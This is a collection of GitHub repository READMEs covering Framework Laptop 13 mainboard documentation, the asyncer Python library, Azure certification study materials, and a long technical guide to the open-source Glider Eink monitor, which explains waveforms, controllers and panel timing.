FrameworkComputer/Framework-Laptop-13;Framework Laptop 13 Documentation for the Mainboard and other key modules in the Framework Laptop 13 (available at https://frame.work/marketplace/mainboards). We designed the Mainboard from the start as a standalone module to make upgrades easy in the Framework Laptop and to also work great as a high-performance single board computer using Intel’s 11th Gen Intel Core, 12th Gen Intel Core, and 13th Gen Intel Core processors along with AMD's Ryzen 7040 Series processors. All you need to do is insert memory, plug in a USB-C power adapter, and hit the tiny power button on-board, and you’ve got a powered-up computer. You can also pick up parts like a Bottom Cover Kit, Input Cover Kit, or Battery from the Marketplace to extend your setup with. See more on this at https://frame.work/blog/mainboard-availability-and-open-source-release. We want to make it as easy as possible to build new projects and products that use the Mainboard, so this repository contains 2D and 3D CAD as well as electrical documentation to help you get started. License Framework Laptop 13 © 2022 by Framework Computer Inc is licensed under CC BY 4.0. To view a copy of this license, visit http://creativecommons.org/licenses/by/4.0/ 3D CAD (in the base directory) External 3D CAD of the system and main modules to enable development of 3D-printed replacement parts, skins, cases, and other accessories. We're excited to see what you do with it! Mainboard This contains 2D drawings of the Mainboard along with a couple of example 3D-printable cases. Both of these are easy to print on home 3D printers. Since these are open source, you are free to modify, remix, and redistribute them however you’d like to. It also contains the pinouts and part numbers of the connectors on the Mainboard. All of this is a starting point for a broader set of open source Mainboard documentation to enable creation of fully compatible third-party Mainboards in the future. Battery 2D drawings, 3D CAD, and the pinout of the Battery to enable re-use. Display 2D drawings, 3D CAD, and the pinout of the Display to enable re-use. Fingerprint Reader Pinout of the Fingerprint Reader. Touchpad Pinout of the Touchpad connectors. Webcam Pinout of the Webcam.;Documentation for the Mainboard and other modules in the Framework Laptop 13;framework,frameworklaptop
FrameworkComputer/Framework-Laptop-13
tiangolo/asyncer;Asyncer, async and await, focused on developer experience. Documentation : https://asyncer.tiangolo.com Source Code : https://github.com/tiangolo/asyncer Asyncer is a small library built on top of AnyIO . Asyncer has a small number of utility functions that allow working with async , await , and concurrent code in a more convenient way under my ( @tiangolo - Sebastián Ramírez ) very opinionated and subjective point of view. The main goal of Asyncer is to improve developer experience by providing better support for autocompletion and inline errors in the editor, and more certainty that the code is bug-free by providing better support for type checking tools like mypy . Asyncer also tries to improve convenience and simplicity when working with async code mixed with regular blocking code , allowing to use them together in a simpler way... again, under my very subjective point of view. 🚨 Warning This small library only exists to be able to use these utility functions until (and if) they are integrated into AnyIO . It will probably take some time for that to happen (or to be decided if it will be included or not). So I made this to be able to use these ideas right now. 🤓 Can I Use It? Yes 🎉 (but continue reading). You can use this and evaluate the library API design I'm proposing. It will probably be useful to know if it works and is useful for you (I hope so). But still, consider this lab material, expect it to change a bit. 🧪 If you use it, pin the exact Asyncer version for your project, to make sure it all works. Have tests for your project (as you should, anyway). And upgrade the version once you know that the new version continues to work correctly. Still, it's just 4 functions , so there's not much to change, if you had to refactor your code to update something it would not be much. And if you don't want to add asyncer as a dependency to your project, you can also just copy the main file and try out those functions, it's quite small (but in that case you won't get updates easily). Requirements As Asyncer is based on AnyIO it will be also installed automatically when you install Asyncer . Installation ```console $ pip install asyncer ---> 100% Successfully installed asyncer anyio ``` How to Use You can read more about each of the use cases and utility functions in Asyncer in the tutorial . As a sneak preview of one of the utilities, you can call sync code from async code using asyncify() : ```Python import time import anyio from asyncer import asyncify def do_sync_work(name: str): time.sleep(1) return f"Hello, {name}" async def main(): message = await asyncify(do_sync_work)(name="World") print(message) anyio.run(main) ``` Asyncer 's asyncify() will use AnyIO underneath to do the smart thing , avoid blocking the main async event loop, and run the sync /blocking function in a worker thread . Editor Support Everything in Asyncer is designed to get the best developer experience possible, with the best editor support. Autocompletion for function arguments: Autocompletion for return values: Inline errors in editor: Support for tools like mypy , that can help you verify that your code is correct , and prevent many bugs. License This project is licensed under the terms of the MIT license .;Asyncer, async and await, focused on developer experience.;python,async,asyncio,trio,anyio
tiangolo/asyncer
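Building on the asyncify() example in the asyncer README above, here is a small sketch (assuming only the asyncer and anyio APIs shown there) that fans several blocking calls out to worker threads concurrently with an anyio task group.

```python
import time

import anyio
from asyncer import asyncify

def do_sync_work(name: str) -> str:
    time.sleep(1)  # stands in for blocking I/O or legacy sync code
    return f"Hello, {name}"

async def main() -> None:
    results: list[str] = []

    async def worker(name: str) -> None:
        # asyncify() runs the blocking function in a worker thread,
        # so the three workers overlap instead of taking ~3 seconds total.
        results.append(await asyncify(do_sync_work)(name=name))

    async with anyio.create_task_group() as tg:
        for name in ("Alice", "Bob", "Carol"):
            tg.start_soon(worker, name)

    print(results)

anyio.run(main)
```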
johnthebrit/CertificationMaterials;Certification Materials A collection of materials related to my certification videos hosted on YouTube. https://onboardtoazure.com (https://youtube.com/ntfaqguy) Please subscribe and support my channel. Thank you. I have a recommended full path with other useful links and materials at https://learn.onboardtoazure.com. This includes my content, links to Microsoft materials, exam sandbox environment links and more. Video and Whiteboard Index Getting started learning Azure introduction video - https://youtu.be/V1Hk45XD6Qw | Video/Playlist | Artifact | |--|--| | AZ-900 Full Course | AZ-900 Course Handout | | AZ-900 Study Cram | AZ-900 Study Cram Whiteboard | | AI-900 Study Cram | AI-900 Study Cram Whiteboard | | DP-900 Study Cram | DP-900 Study Cram Whiteboard | | MS-900 Study Cram | MS-900 Study Cram Whiteboard | | PL-900 Study Cram | PL-900 Study Cram Whiteboard | | SC-900 Study Cram | SC-900 Study Cram Whiteboard | | AZ-104 Study Playlist | | | AZ-104 Study Cram | AZ-104 Study Cram Whiteboard | | SC-100 Study Playlist | | | SC-100 Study Cram | SC-100 Study Cram Whiteboard | | SC-300 Study Playlist | | | SC-300 Study Cram | SC-300 Study Cram Whiteboard | | AZ-500 Study Playlist | | | AZ-500 Study Cram | AZ-500 Study Cram Whiteboard | | AZ-700 Study Playlist | | | AZ-700 Study Cram | AZ-700 Study Cram Whiteboard | | AZ-305 Study Playlist | | | AZ-305 Study Cram | AZ-305 Study Cram Whiteboard | | AZ-400 DevOps Master Class | DevOps Master Class Materials Repo | Certification renewal experience video - https://youtu.be/L9luTi9LyXU;A collection of materials related to my certification videos;[]
johnthebrit/CertificationMaterials
Modos-Labs/Glider;Glider

Open-source Eink monitor with an emphasis on low latency.

Note: This repo only contains the hardware design; the gateware running on the FPGA is my open-source Caster EPDC design. This README also contains information about Caster. This is a long document, containing not just information about this project, but also pretty much everything I know about Eink. Given that it's a bit hard to gather information about Eink online, I think this is the right thing to do. Use the following table of contents to navigate around.

Eink is a registered trademark and brand of E Ink Corporation. All the contents provided in this repo are based on publicly available information online and original research. They are not endorsed by Eink in any way and they may contain errors and/or inaccuracies.

If you're interested in obtaining a board, or the reference monitor, see and subscribe to the pre-launch page for the Modos Paper Monitor on Crowd Supply for updates.

If you are interested in Eink or any other display technologies, I have a Discord server for that. Feel free to join: https://discord.gg/rtT7euSHQS. (This Discord server is also not endorsed by Eink or any other company. It's not a customer support server.)

Table of Contents

- Overview: Features, Hardware, Components
- Eink Screens: Basic Theory of Operation, Advantages and Disadvantages, The Role of Eink Controller, Screen Panel Types, Using Screen with Integrated Controller, Using Screen without Integrated Controller, Understanding Waveform, Greyscale Display, Color Display, Dithering, Eink Screen Generations
- Caster/Glider Design: Low Latency Drive, Hybrid Greyscale Mode, Limitations, Hardware Design Decisions, Gateware Architecture, Firmware Functions, Resources Utilization
- Building: PCB, FPGA Bitstream, MCU Firmware, Working with Waveforms
- Compatible Screens
- References
- License
- Appendix: Using Screens without Datasheet, Screen List

Overview

Features

- Complete solution for low-latency/high-refresh-rate EPD monitors
- Supports electrophoretic display panels with parallel I/F (Eink(R), SiPix and DES)
- Supports both monochrome and color-filter-array (such as Kaleido(TM)) based color screens
- Extremely low processing delay of <20 us
- Supports binary, 4-level grayscale, and 16-level grayscale output modes
- Latency-optimized binary and 4-level grayscale driving modes
- Hybrid automatic binary and 16-level grayscale driving mode
- Host software runtime-controllable regional update and mode switching
- Hardware Bayer dithering, blue-noise dithering, and error-diffusion dithering with no additional latency
- Controller natively supports FPD-Link (LVDS), DVI (TMDS), and MIPI-DSI input
- Board-level design supports USB-C (USB Type-C DisplayPort Alt Mode) and DVI input

Hardware

- Xilinx(R) Spartan-6 LX16 FPGA running Caster
- DDR3-800 framebuffer memory
- Type-C DisplayPort Alt-Mode video input with onboard PTN3460 DP-LVDS bridge, or DVI (via microHDMI connector) video input with onboard ADV7611 decoder
- Epaper power supply with up to 1A peak current on the +/-15V rail, supporting large panels
- VCOM kick-back voltage measurement support
- On-board RaspberryPi(R) RP2040 microcontroller for USB communication and firmware upgrade
- Up to 133 MP/s processing rate with dithering enabled, >200 MP/s when disabled

The board is designed with KiCad. You may need the latest stable version of KiCad to open the source files.

Components

This repo hosts the PCB design, firmware source code, and a reference 3D-printable case design. The RTL code is in a separate repo: https://gitlab.com/zephray/Caster/.
Eink Screens

Eink is the brand of a family of paper-like electrophoretic displays. The underlying technology was invented in the MIT Media Lab between 1995 and 1997 by Barrett Comiskey, J.D. Albert, and Joseph Jacobson, who later founded the E Ink Corporation to commercialize it. Nowadays these displays are commonly used in e-readers and electronic shelf labels. You've probably seen them on a Kindle, in stores, or maybe in some train stations as well.

(Example applications: eReaders/tablets, electronic shelf labels, digital signage. Source: https://www.eink.com/application, image copyright Eink Corporation.)

This section gives an overview of electrophoretic displays, including the screen panels available and the underlying technology. Note this project doesn't and can't support all electrophoretic screens. This documentation also solely focuses on using existing off-the-shelf screen panels rather than the physics or manufacturing process of one.

Basic Theory of Operation

In the simplest form, you have charged particles of different colors, dispersed in some oil, in some transparent container. By applying an electric field, the particles can be moved up or down to produce either black or white, or a mixture of the two. (Source: https://www.eink.com/tech/detail/How_it_works, copyright Eink Corporation)

There are multiple technologies based on this basic concept, namely Eink's micro-capsule display, SiPix (now acquired by Eink)'s micro-cup display, and WFT's DES display. They differ in the specific way of confining the particles in containers, but are otherwise very similar.

The pixels on the screen are typically arranged as a 2D array, driven with TFTs. The pixels are scanned/driven periodically at a fixed refresh rate, typically ranging from 50Hz to 120Hz. Applying a positive voltage on a pixel typically drives the particles toward the white state, while applying a negative voltage drives the particles toward the black state. This is similar to active matrix TN/IPS LCDs, which also use 2D TFT arrays and electric fields for changing state. However, unlike LCDs, EPDs maintain their state after the electric field is removed. So unlike LCDs, which require continuous refreshing, EPDs only need to be refreshed until the pixels are fully driven.

In terms of driving the screen panel, depending on the pixel value (1 or 0), each pixel is driven either with a positive voltage or a negative voltage. A global counter can be used to count the frames elapsed and stop driving the pixels after a predefined period of time (for example, 100ms). Two framebuffers are typically used for determining whether a pixel has changed color or not. If not, the pixel does not need to be driven.

Advantages and Disadvantages

In terms of display quality, EPDs are no match for modern IPS LCDs. The following is a comparison table of key parameters. The specific numbers vary depending on the screen used, but should be within the same ballpark.

| | Monochrome EPD | CFA-based Color EPD | Transmissive TFT IPS LCD | Reflective TFT TN LCD |
|-|-|-|-|-|
| Contrast Ratio | ~17:1 | ~14:1 | ~1000:1 | ~14:1 |
| Colors | 16 (Greyscale) | 4096 | 16M | 256 |
| Color Gamut | N/A | ~1.5% sRGB | ~99.9% sRGB | N/A |
| Reflectivity | ~45% | ~25% | N/A | ~15% |
| Response Time | ~150ms | ~150ms | ~10ms | ~15ms |

It has a few advantages. It reflects light instead of emitting light, so it generally consumes less power and can be used outdoors, etc.
It's also bistable, which means that it retains the image after the power has been removed. Personally, the biggest differentiating factor for me (the author of this README) is that it looks like paper. The image above shows a comparison between a reflective TFT LCD (a SHARP memory LCD in this case) and Eink. The LCD has a mirror-like texture whose reflectivity changes drastically with viewing angle, while the Eink is more paper-like.

| ZBD LCD | Ch LCD | STN LCD |
|-|-|-|
| Bistable, reflective, high contrast, no greyscale, ~10s refresh | Bistable, reflective, lower contrast, up to 32-level greyscale, ~5s refresh | Volatile, reflective, lower contrast, up to 32-level greyscale, ~100ms response |

There are many other reflective or bistable display technologies. They are all interesting displays in their own right, but none of them feels like paper (yet). Overall, there is no single perfect display technology. Each has its own unique strengths. Pick the right one for your project.

The Role of Eink Controller

The Eink controller is in some ways similar to the display controller (DC/CRTC) + timing controller (TCON) in a typical LCD-based system. It takes the raw image data and converts it to the signals required to drive the screen.

To understand the actual work of an Eink controller, start from the basic concept: the color of a pixel can be changed by applying a positive or negative voltage for a finite period of time. From the controller's perspective, depending on the current state and the desired state of the pixel, there are 4 possibilities:

| Current State | Target State | Action |
|-|-|-|
| Black | Black | No operation |
| Black | White | Apply positive voltage |
| White | Black | Apply negative voltage |
| White | White | No operation |

The controller needs to store and maintain the screen state inside its own buffer memory, so it would typically have a large on-chip SRAM or an off-chip SDRAM controller. The controller should also have a timer to ensure the screen doesn't get overdriven or underdriven.

The controller often uses a so-called "waveform" to replace the action column of the previous table. Instead of hardcoding the action for each state transition, the actions are stored in a look-up table (LUT) which can be modified at runtime to allow higher flexibility (a toy model of such a LUT is sketched below). Controllers may also offer more advanced features such as dithering acceleration, multiple region updates, automatic LUT selection, etc.
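To make the controller's job concrete, here is a minimal Python sketch of the state-transition table above generalized into a waveform LUT with a frame counter. Frame counts and voltage encodings are illustrative placeholders, not values from Caster or any vendor waveform.

```python
# Drive voltages applied by the source driver for one pixel, one frame.
VPOS, VNEG, VZERO = +15, -15, 0  # volts; placeholder rail values

# Waveform LUT: (current_state, target_state) -> list of per-frame voltages.
# This generalizes the 4-row action table above; real waveforms also depend
# on temperature and cover many more greyscale states.
WAVEFORM = {
    (0, 0): [],           # black -> black: no operation
    (1, 1): [],           # white -> white: no operation
    (0, 1): [VPOS] * 10,  # black -> white: drive positive for N frames
    (1, 0): [VNEG] * 10,  # white -> black: drive negative for N frames
}

def frame_voltages(prev, target, frame):
    """Voltage for each pixel at a given frame since the update started."""
    out = []
    for p, t in zip(prev, target):
        seq = WAVEFORM[(p, t)]
        out.append(seq[frame] if frame < len(seq) else VZERO)  # stop once fully driven
    return out

prev = [0, 0, 1, 1]    # framebuffer holding the screen's current state
target = [0, 1, 0, 1]  # desired image
for f in range(10):    # scan frames at the panel refresh rate
    drive = frame_voltages(prev, target, f)  # ship `drive` to the source drivers here
```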
This gives some hints about the advantages and disadvantages of the two types:

| | Without Controller | With Controller |
|-|-|-|
| System Cost | High. A dedicated controller or an SoC with an integrated controller is usually required. Needs a dedicated power supply. | Low. Virtually any MCU can drive the screen directly, and the power supply is integrated. |
| Greyscale Levels | Generally 16 (4bpp), up to 32 (5bpp) | Generally 2 (BW only) or 4 (2bpp); with some hacks, up to 16 (4bpp) |
| Refresh Speed | Generally fast (100ms~300ms) for BW. Depends on the screen used and the system architecture. | Generally fast (100ms~300ms) for BW if partial refresh is enabled. Greyscale is much slower; BWR or BWY screens are slower still. |
| Total Update Latency | Generally the same as the refresh time. Depends on the system architecture. | Slow. Ranging from 100ms to several seconds depending on the resolution. |

Please keep in mind the discussion is about off-the-shelf screens you can buy today. These tradeoffs do not necessarily come from whether the controller is integrated or not.

Note that I mentioned both refresh speed and total update latency. They are different:

The refresh speed refers to the time the refresh itself takes: from the screen starting to change, to the screen finishing showing the new content.

The total update latency refers to the time from the processor requesting a screen update, to the screen finishing showing the new content.

As you can see, total update latency is the biggest issue for screens with controllers. This is the main reason why they are rarely used in e-readers, cell phones, or PC monitors. This diagram illustrates the difference between the two.

It should be noted that screens without controllers have the flexibility to be driven quickly, but the system designer might not architect the system for low latency.

Using Screen with Integrated Controller

Screens with integrated controllers have almost everything already integrated. Common display panels of this type only need a few external capacitors, inductors, and MOSFETs to support the integrated bipolar power supply circuit; then they can be hooked up to MCUs or MPUs using common interfaces like SPI or I2C. There are a lot of driver boards and examples for these screens available online.

To be expanded (TODO)

Using Screen without Integrated Controller

This could get complicated. Note I used a lot of "generally" in the previous comparison table, because there are many things one could do to drive these screens, some of which would certainly impact the performance. The main issue here is the controller chip. There are three solutions for driving these screens:

Using a dedicated controller chip to drive the screen

Using an SoC that has an integrated controller

Using a fast MCU/SoC to emulate the controller with GPIO (software timing controller)

Then, again, here is a comparison between them:

| | Specialized controller chip | SoC with integrated controller | MCU + Software TCON |
|-|-|-|-|
| Resolution | UXGA+ | UXGA+ | Limited by MCU RAM. Up to XGA with SRAM, UXGA with PSRAM, UXGA+ with DDR |
| Greyscale | Up to 32 | Up to 32 | Up to 32 |
| Partial Update | Yes | Yes | Yes |
| Total Update Latency | Depends. Could be very close to the refresh speed, could be as slow as screens with controllers | Same as refresh speed | Same as refresh speed if data is internally generated (not streamed from an external device such as a PC) |
| Suitable Applications | IoT devices, E-readers, cellphones, E-ink monitors,
possibly E-ink laptops | Advanced IoT devices, E-readers, cellphones, E-ink typewriters, possibly lower-performance E-ink laptops | When using an MCU: IoT devices, large ESLs, simple DIY E-readers. When using an MPU: same as SoC with integrated controller |

When using a dedicated controller, it can accept data from external devices. This allows it to be used in many different types of applications, ranging from IoT devices and ESLs to PC monitors with relatively fast refresh rates and low latency. When using an SoC or MCU, the display content is generated by the SoC or MCU itself, which is ultimately limited by the capability of that chip. Given that current SoCs with E-ink display controllers are usually limited in performance, the applications are limited as well. The same goes for MCUs: they do what an MCU can do. You could find ways to stream video data into SoCs or MCUs by using USB, camera interfaces, WiFi, etc., but this might not be optimal.

Existing Solutions

Specialized controller chip

Closed-source

EPSON S1D13xxx: Widely used EPD controllers in early E-readers. Proprietary, no documents available. Probably EOL.

IT8951: Used on the Waveshare EPD HAT. Documents are available. It works with large EPDs up to 2048x2048. The drawback is speed, as the interface between the processor and the IT8951 can be slow. This is similar to the situation with screens with integrated controllers.

T1000: Also known as IT8957, an upgraded model of the IT8951. It supports even higher resolutions, and features a higher-speed MIPI DSI interface to mitigate the slow interface of the IT8951.

Waveshare HDMI driver board: FPGA-based controller. Closed source but easily purchasable; could be integrated into larger projects as a module.

Open-source

This project (Caster + Glider): FPGA-based controller, multiple update modes, ultra-low latency processing, and wide range of screen support.

https://hackaday.io/project/21607-paperback-a-desktop-epaper-monitor: FPGA-based controller. However, it doesn't support partial update mode and is slower.

https://hackaday.io/project/21168-fpga-eink-controller: FPGA-based controller; supports vendor waveforms with reasonable speed.

SoC with integrated controller

RK29xx: Fairly old, Cortex-A8 based (RPi 1 level performance), 55nm, EOL

RK3026/RK3028: Fairly old, Cortex-A9 based (RPi 2 level performance), 40nm, EOL

i.MX 50: Fairly old, Cortex-A8 based (RPi 1 level performance), 65nm, in production

i.MX 6ULL: Cortex-A7 based (RPi 1 level performance), 40nm, in production

i.MX 6S/D: Fairly old, Cortex-A9 based (RPi 2-3 level performance), 40nm, in production

i.MX 7S/D: Cortex-A7 based (RPi 2 level performance), 28nm, in production

i.MX 8ULP: Cortex-A35 based (RPi 2 level performance), 28nm FD-SOI, in production

AW B200: Cortex-A53 based (RPi 2 level performance), 28nm, in production

MT8113: Cortex-A53 based (RPi 2 level performance), 12nm, in production

RK3566/RK3568: Cortex-A55 based (RPi 3 level performance), 22nm, in production

RK3576: Cortex-A72 + A53 based (RPi 4-5 level performance), 8nm, in production

MCU/SoC + Software TCON

http://essentialscrap.com/eink/waveforms.html: One of the earliest e-ink hacks. Limited in performance but still useful as a reference.

NekoCal: One of the earliest e-ink software TCONs with greyscale support. Used to be available as a DIY kit. No longer updated, but still useful as a reference.

InkPlate 6/10: Commercially available. Based on ESP32.
EPDiy: Based on ESP32, supports a lot of different screens; recommended if you want to build a device with ESP32+Eink or embed it into a larger project.

Interface Signals and Timing

The interface signals and timing are fairly similar to LCDs without a controller. The following is a list of signals typically found on EPDs:

GDOE/ MODE: Gate driver output enable
GDCLK/ CKV: Gate driver clock (like HSYNC in LCD)
GDSP/ SPV: Gate driver start pulse (like VSYNC in LCD)
SDCLK/ XCL: Source driver clock (like PCLK in LCD)
SDLE/ XLE: Source driver latch enable (like HSYNC in LCD)
SDOE/ XOE: Source driver output enable
SDCE/ XSTL: Source driver start pulse (like DE in LCD)
SD: Source driver data (8-bit or 16-bit)

SD signals go into the source driver, typically in the X direction. GD signals go into the gate driver, typically in the Y direction. It's a 2D array: the gate driver selects one line at a time, and the source driver outputs the voltages for all the pixels in that line. Conceptually, it's like a raster scan on a CRT. To send one field of data, both GD and SD are reset to the start position using the start pulse signals. Data are then transmitted to the source driver 4 or 8 pixels at a time. Once a line has been fully transmitted, the source driver is reset to the beginning position by a start pulse, and the gate driver moves to the next line on a pulse of the gate driver clock. Once all lines have been scanned, the entire process repeats for the next field.

One notable difference from LCDs is that each pixel is represented by 2 bits. This, however, doesn't mean each pixel is 2bpp or 4-level greyscale. The 2 bits per pixel are used to encode the voltage applied to the pixel:

00: No voltage
01: Negative voltage
10: Positive voltage
11: No voltage

Just like CRT/ LCD, there are also blanking periods in the overall timing (periods of waiting without active pixel data being sent). They have identical meanings to those in CRT/ LCD systems:

(Source: https://projectf.io/posts/video-timings-vga-720p-1080p/, Copyright Will Green)

The following is a piece of pseudo-code implementing the Eink timing:

```c
#define DATA_BUS_WIDTH  8 // 8bit wide bus
#define PIXEL_PER_CYCLE (DATA_BUS_WIDTH / 2)
#define VFP   12  // Vertical front porch
#define VSYNC 1   // Vertical sync length
#define VBP   2   // Vertical back porch
#define VACT  758 // Vertical active lines
#define HFP   72  // Horizontal front porch
#define HSYNC 2   // Horizontal sync length
#define HBP   2   // Horizontal back porch
#define HACT  (1024 / PIXEL_PER_CYCLE)

void pulse_h_clock() {
    sdclk = 1;
    sdclk = 0;
}

void drive_line(bool v_in_act) {
    sdce = 1;
    gdclk = 0;
    for (int i = 0; i < HFP; i++)
        pulse_h_clock();
    sdle = 1;
    gdclk = 1;
    for (int i = 0; i < HSYNC; i++)
        pulse_h_clock();
    sdle = 0;
    for (int i = 0; i < HBP; i++)
        pulse_h_clock();
    if (v_in_act)
        sdce = 0;
    for (int i = 0; i < HACT; i++) {
        send_data();
        pulse_h_clock();
    }
}

void drive_frame() {
    gdoe = 0;
    sdoe = 0;
    gdsp = 1;
    for (int i = 0; i < VFP; i++)
        drive_line(false);
    gdsp = 0;
    gdoe = 1;
    sdoe = 1;
    for (int i = 0; i < VSYNC; i++)
        drive_line(false);
    gdsp = 1;
    for (int i = 0; i < VBP; i++)
        drive_line(false);
    for (int i = 0; i < VACT; i++)
        drive_line(true);
}
```

More explanation can be found at http://essentialscrap.com/eink/index.html

Understanding Waveform

The waveform is a look-up table used by the eink controller to determine how to drive the pixels. It is mostly useful for greyscale image display, but is generally used for binary image display as well.
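To make the mechanism concrete before the detailed description below, here is a minimal sketch of the lookup a controller performs. This is illustrative only: the names (voltage_t, lut, lookup_pixel) and array sizes are made up, and a real controller implements this in hardware with on-chip RAM rather than C code.

```c
#include <stdint.h>

// Hypothetical sizes; real waveforms vary.
#define GREY_LEVELS 16
#define MAX_FRAMES  64

typedef enum { VOLT_NOP = 0, VOLT_VNEG = 1, VOLT_VPOS = 2 } voltage_t;

// lut[src][dst][frame]: voltage to apply at a given frame of the
// transition from greyscale level 'src' to level 'dst'.
// Loaded from the waveform file at runtime.
static voltage_t lut[GREY_LEVELS][GREY_LEVELS][MAX_FRAMES];

// Called once per pixel, every frame, while an update is in progress.
voltage_t lookup_pixel(uint8_t src, uint8_t dst,
                       uint16_t frame, uint16_t frame_count)
{
    if (frame >= frame_count)
        return VOLT_NOP; // sequence finished: stop driving this pixel
    return lut[src][dst][frame];
}
```

The next paragraphs describe the three dimensions of this table and how the controller steps through it.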
The look-up-table has 3 inputs (dimensions): frame number, source grayscale level, and destination grayscale level. During the update process, for a given pixel, the source and destination levels stay the same while the frame number increments each frame. The lookup is done for every pixel on every frame. The controller may choose different LUTs depending on the ambient temperature. Mode switching is also implemented by simply switching between different LUTs.

This is essentially what a typical eink controller does: for each pixel, look up the table to determine the voltage to use, and repeat this over a number of frames with an incrementing frame counter, until all pixels are fully driven. It should be obvious that the waveform file itself is independent of the resolution, as the waveform only concerns a single pixel. Even with an incorrect or suboptimal waveform, the screen should at least display some recognizable image.

Waveform Example

There are several sample waveform tables provided in the project repo. Take the GC16 (Greyscale clearing, 16-level) waveform of the GDEW101C01 as an example: https://github.com/zephray/NekoInk/blob/master/waveform/gdew101_gd/test_M2_T0.csv

Take one line from that file:

6,13,0,0,0,0,0,0,0,0,0,2,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,0

This means that to go from greyscale level 6 to level 13, the pixel needs to go through the following sequence. Each number is the operation for one frame: 0 is no-operation, 1 is darken, and 2 is lighten. In this case, there are 38 frames: the first 9 frames do nothing, then lighten for 1 frame, darken for 10 frames, lighten for 16 frames, and finally darken for 1 frame with no operation on the last frame. This is the sequence to change a pixel from level 6 to level 13. Such a lookup is done for every pixel on every frame. For specifics on waveform file formats, check the Working with Waveforms section.

Waveform Modes

To give system designers more flexibility, Eink controllers often offer multiple "modes", like binary mode, 16-level grayscale mode, 16-level grayscale mode with reduced flashing, 4-level grayscale mode, etc. The waveform provided by Eink has many modes. There is a good document from Eink describing the modes: https://www.waveshare.net/w/upload/c/c4/E-paper-mode-declaration.pdf

It provides a good overview of the modes. I am just going to add some comments:

GC in GC16 stands for "greyscale clearing". GC does not stand for greyscale; there are 16-level greyscale modes that aren't called GC16.

Officially there are no 32-level greyscale modes (yet). There are 5-bit waveforms, which internally use 5 bits per pixel and potentially allow up to 32 levels of greyscale, but no such waveform exists (yet).

There are no 16-level greyscale modes without flashing. DU4 is the only greyscale mode that's non-flashing.

The GL16 mode, as described, only works for black text on a white background. When refreshing greyscale images, GL16 behaves like GC16.

The GLR16 mode is also called the REAGL mode, and the GLD16 mode is also called the REAGL-D mode. Eink doesn't even seem to know whether it should be spelled REAGL or REGAL: Google searches for "REAGL site:eink.com" and "REGAL site:eink.com" both return several results.

Eink-provided waveforms usually implement all of these modes, but this is not required. The waveform file may also contain the waveform tables in a different order. In terms of the waveform itself, the tables for GL16, GLR16, and GLD16 are identical.
This is expected: REAGL requires an additional algorithm on the host image-processing side, and is not a technology based on tweaking the waveform.

Waveform Tweaks

Some commercial implementations allow users to reduce the frame count and/ or alter the waveform playback speed, so the user can trade contrast ratio against frame rate.

Greyscale Display

Other than full white and full black, with appropriate modulation, Eink screens can also display some levels of greyscale (typically 16). The basic idea is simple: if the pixel is not fully driven (say it's only driven for 50ms when it takes 100ms to reach full black/ white), it stays in a grey state. There are two ways of achieving this modulation:

- Modulate the frame time
- Modulate the number of frames at a constant frame rate

Both are possible, as described below.

Frame Time Modulation

This method changes the drive time by changing the length of a single frame. The screen is only driven for 15 or 31 frames for 16-level and 32-level greyscale respectively, but the frame time (and thus the frame rate) is altered to provide the desired driving time. The LUT would be a one-dimensional look-up table, only containing the incremental time required to drive the pixel to the next greyscale level. The source/ gate driver output-enable lines are toggled to achieve the desired driving time. This method doesn't seem to be implemented in any commercial solution and is significantly slower than the second method. But it certainly works: the 32-level greyscale demo shown in the picture above is achieved using this method.

Frame Count Modulation

This method changes the drive time by changing the number of frames applied to the screen. The screen is still driven at a constant frame rate. The following is a simplified, hypothetical waveform table for achieving 4-level greyscale:

| Previous State | Target State | Frame 0 | Frame 1 | Frame 2 | Frame 3 | Frame 4|
|-|-|-|-|-|-|-|
| Black | Black | NOP | NOP| NOP | NOP | NOP |
| Black | Dark Grey | VPOS | VNEG | VPOS | NOP | NOP |
| Black | Light Grey | VPOS | VNEG | VPOS | VPOS | NOP |
| Black | White | VPOS | VNEG | VPOS | VPOS | VPOS |

Note how it alternates between VPOS and VNEG in the beginning. This is often called the "activation phase" and improves the contrast ratio. Putting this detail aside, it changes the number of VPOS frames to settle on different grey levels.

The actual greyscale driving sequences used in commercial implementations are more complex than this, often involving switching the pixel towards black/white a few times before settling. This design is partially due to the limited time-control granularity and other temperature/ manufacturing variance-related concerns. The side-effects of such a driving sequence are that the refresh process is "flashing", and that it is slower than displaying only a 1-bit binary image.

Color Display

There are several different technologies that can be used to build full-color EPDs. The 2 most common ways are to use a color-filter-array (CFA) or to use a multi-pigment color display. The following picture shows a multi-pigment color display (ACeP Gallery 3) on the left and a CFA-based color screen (Kaleido Plus) on the right, displaying the same image.

(Original illustration copyright MiHoYo)

Color Filter Array

CFA stands for color filter array, which is a colored glass/ film on top of the screen pixels. This is also the technology used in most color LCDs. Eink Kaleido, Eink Triton, and color DES are based on this technology.
The main advantage is that it's relatively simple to control: the low-level driving is the same as for greyscale panels. Thus it has the same refresh time (100~200ms) and the same number of greyscale levels (16 levels per component translate to 16^3 = 4096 colors). The drawback is that the CFA filters out some light (due to its colored nature), so the screen reflectivity is negatively affected by the CFA. The screen ends up being quite dark. Up to now, most color E-readers use CFA-based displays.

This project supports all three major types of CFA-based EPD screens: color DES screens, Eink Triton, and Eink Kaleido.

Case Study: GDEW101C01 (CFA-based, DES)

The GDEW101C01 is a 10.1" color DES screen made by Good Display / WeiFeng Tech. It uses a CFA to produce color images. As a result, to the eink controller hardware, it's just a normal greyscale panel with a bunch of pixels. However, the pixels are colored depending on their location due to the CFA. The coloring of the pixels can be handled either by hardware or by software.

Pixel Arrangement

Color DES is a bit different from a typical color TFT LCD in terms of CFA design. Typically on TFT LCDs, one RGB group is called a pixel, and each R/G/B component is called a sub-pixel. On color DES, what would be a sub-pixel is instead called a pixel, and each pixel is either red, green, or blue. In the display industry, such pixels are more commonly referred to as dots.

Pengo, CC BY-SA 3.0 https://creativecommons.org/licenses/by-sa/3.0, via Wikimedia Commons

Here is an actual photo of the DES panel under the microscope:

In the above photo, the DES pixel arrangement is the same as on the OLPC XO-1. Notably, many (but not all) of Eink's Kaleido 3 screens also use the same pixel arrangement.

Having no subpixels, with each pixel having only 1 color, doesn't necessarily mean that the effective resolution needs to be divided by 3. This arrangement is slightly more "efficient" than the RGB stripe in terms of perceptive resolution. You can find a more detailed analysis in the paper Comparing the Effective Resolution of Various RGB Subpixel Layouts.

Processing image for Color DES

If an image is displayed on color DES without any processing, it looks like a greyscale image. This is similar to sending the same value to the R/G/B components on a color LCD. To get color, send only the color component that corresponds to each pixel's color.

